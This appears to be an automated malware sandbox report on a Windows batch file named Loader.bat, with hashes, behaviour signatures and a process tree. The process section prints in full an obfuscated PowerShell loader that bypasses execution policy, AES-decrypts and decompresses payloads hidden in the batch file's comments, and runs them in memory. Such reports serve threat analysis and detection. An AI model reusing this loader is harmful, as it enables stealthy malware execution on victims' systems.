Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
21-05-2024 22:45
Static task
static1
Behavioral task
behavioral1
Sample
Loader.bat
Resource
win7-20240221-en
General
-
Target
Loader.bat
-
Size
422KB
-
MD5
e87e3e968e80526bc362bfdd1e4bf266
-
SHA1
4fee6fa14c33b6de899cfd3cd9dc8fc9de2a1a7c
-
SHA256
e5f8aa6ad4a268a2d8d5a7bf151dd9df36cf5a9fdcd76ee1bcfc357a245c3d2e
-
SHA512
edd5bbcc9b42ff5535fc65adc28277255deffeaa7c1d8b4d4e0599a1d9df15f700a30a052ae991069f9bd3d2b9eede700fd202b282ebc8358c75d9175cfc8abd
-
SSDEEP
12288:xTsiBZqGoi2wPrgGoBUUmCXb0imm9dJe/PN:tsi+GoQjUvGHN
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepid process 2556 powershell.exe 2136 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2136 powershell.exe 2556 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2136 powershell.exe Token: SeDebugPrivilege 2556 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exedescription pid process target process PID 2336 wrote to memory of 2136 2336 cmd.exe powershell.exe PID 2336 wrote to memory of 2136 2336 cmd.exe powershell.exe PID 2336 wrote to memory of 2136 2336 cmd.exe powershell.exe PID 2336 wrote to memory of 2556 2336 cmd.exe powershell.exe PID 2336 wrote to memory of 2556 2336 cmd.exe powershell.exe PID 2336 wrote to memory of 2556 2336 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "& {}"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SlSTUHH3vjTFF6yZmXkQecEZjJqcfO2AzXY6guJbvCw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SHhPUHLYvn7pQ31hTUN8w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GXmwo=New-Object System.IO.MemoryStream(,$param_var); $NERXN=New-Object System.IO.MemoryStream; $AFVdE=New-Object System.IO.Compression.GZipStream($GXmwo, [IO.Compression.CompressionMode]::Decompress); $AFVdE.CopyTo($NERXN); $AFVdE.Dispose(); $GXmwo.Dispose(); $NERXN.Dispose(); $NERXN.ToArray();}function execute_function($param_var,$param2_var){ $gNhZA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VuTFK=$gNhZA.EntryPoint; $VuTFK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Loader.bat';$rxwmR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Loader.bat').Split([Environment]::NewLine);foreach ($pGzCS in $rxwmR) { if ($pGzCS.StartsWith(':: ')) { $GlIcB=$pGzCS.Substring(3); break; }}$payloads_var=[string[]]$GlIcB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5322a9e28b34de8d50c4f7ebca3d3a7a0
SHA111b7623f19c5bb7ea718e88e2f068dfbe35a9169
SHA256078d91f7ae3ab1977ddccaf4eba4df4e68fdd5e607a3dd3a8d3e0625e43711f9
SHA51218d788bc5038ecb0e3d2e285c43bdb00c9692a730f0374ca4ff9ce147739703a5320e4a0b090d9709cf35234bb5b1da60fb52f70ba2531541924b39875f8c2b4